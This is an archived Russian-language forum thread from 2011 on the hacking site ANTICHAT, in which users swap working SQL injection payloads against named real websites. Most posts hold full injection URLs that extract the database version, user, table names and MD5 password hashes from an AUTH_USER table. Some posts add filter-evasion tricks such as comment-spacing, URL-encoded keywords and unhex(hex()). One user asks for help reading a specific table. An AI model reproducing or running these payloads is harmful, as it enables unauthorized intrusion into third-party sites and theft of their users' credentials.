ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
27.11.2011, 11:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
28093
Репутация:
11
|
|
lightangel,
http://www.shopoldcoloradocity.com/content.php?id=-97/**/union/**/select/**/1,version(),3,4,user(),6,7,8,9,10,11,12--
Site filter symbol "+". But you can use /**/
|
|
|
|
27.11.2011, 13:37
|
|
Новичок
Регистрация: 28.05.2010
Сообщений: 0
Провел на форуме:
5422
Репутация:
0
|
|
Сообщение от Boolean
Boolean said:
LOAD_FILE('/путь/до/конфиг/апача');
Список можно посмотреть тут: /thread49775.html
Попробывал все - результат NULL
Есть ещё какие-нибудь варианты?
|
|
|
27.11.2011, 15:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
7046
Репутация:
1
|
|
уважаемые знатоки
Доброго дня всем, люди кто нибудь сталкивался с такой ситуацией:
http://www.site.ru/ru/***/***/***/?nd_4=***&***_4=***&***_*=1'+and+(select+1+from(se lect+count(*),(select+concat(0x3a,password_md5,0x3 a)+from+AUTH_USER+limit+1,1),floor(rand(0)*2))+hav ing+min(0))+and+'1'='1
Message of provider: SQLSTATE[42000]: Syntax error or access violation: 1248 Every derived table must have its own alias.' in....
или как вариант запрос havij
http://www.site.ru/ru/***/***/***/?nd_4=***&***_4=***&***_*=1'+and(select+1+from(sel ect+count(*),concat((select+(select+(select+concat (password_md5)+from+AUTH_USER+limit+0,1))+from+inf ormation_schema.tables+limit+0,1),floor(rand(0)*2) )x+from+information_schema.tables+group+by+x)a)+an d+'1'='1
с ошибкой вида:
Subquery returns more than 1 row.' in
|
|
|
|
27.11.2011, 16:55
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906
Репутация:
-14
|
|
lion-art
Я не сталкивался. Попробуй заменить + на /*--*/ , /**/ и т.д
|
|
|
|
27.11.2011, 20:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
35174
Репутация:
-6
|
|
http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=1' (SQL Error)
Cannot get order by, any solution?
|
|
|
|
27.11.2011, 22:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
35174
Репутация:
-6
|
|
Thank you, Ruslan1817.
I still have a problem.
http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=1'+union+select+1,2,3,4, version(),6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20+--+
Then I get 5.1.41-3ubuntu12.10-log, but when I execute like this.
http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=1%27+union+select+1,2,3, 4,group_concat(table_name),6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20+from+information_schema.tables%2 0where%20table_schema=database()+--+
And I get- Illegal mix of collations for operation 'UNION'
Why?
|
|
|
|
27.11.2011, 22:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Сообщение от lightangel
lightangel said:
Thank you, Ruslan1817.
I still have a problem.
http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=1'+union+select+1,2,3,4, version(),6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20+--+
Then I get 5.1.41-3ubuntu12.10-log, but when I execute like this.
http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=1%27+union+select+1,2,3, 4,group_concat(table_name),6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20+from+information_schema.tables%2 0where%20table_schema=database()+--+
Why?
http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=1'+union+select+1,2,3,4, (%73elect(@x)%66rom(%73elect(@x:=0x00),(%73elect(n ull)%66rom(%69nformation_schema.%63olumns)%77here( %74able_schema!=0x696e666f726d6174696f6e5f73636865 6d61)%61nd(0x00)%69n(@x:=%63oncat(@x,0x3c62723e,ta ble_schema,0x2e,table_name,0x3a,%63olumn_name))))x ),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+
|
|
|
|
27.11.2011, 22:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
35174
Репутация:
-6
|
|
Thanks, can you give me a guide or paper on how to move foward.
|
|
|
|
27.11.2011, 22:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
28093
Репутация:
11
|
|
Сообщение от lightangel
lightangel said:
Thank you, Ruslan1817.
I still have a problem.
http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=1'+union+select+1,2,3,4, version(),6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20+--+
Then I get 5.1.41-3ubuntu12.10-log, but when I execute like this.
http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=1%27+union+select+1,2,3, 4,group_concat(table_name),6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20+from+information_schema.tables%2 0where%20table_schema=database()+--+
And I get- Illegal mix of collations for operation 'UNION'
Why?
, nice but easy solution is unhex(hex())
Код HTML:
HTML:
http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=-1%27+union+select+1,2,3,4,unhex(hex(table_name)),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+limit+0,1--+1
And easy construction
|
|
|
|
27.11.2011, 22:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
35174
Репутация:
-6
|
|
Site has 34 tables, I found out doing this.
Код:
Code:
http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=-1%27+union+select+1,2,3,4,unhex(hex(table_name)),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+limit+33,1--+3
How do I get an info of a particular table? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
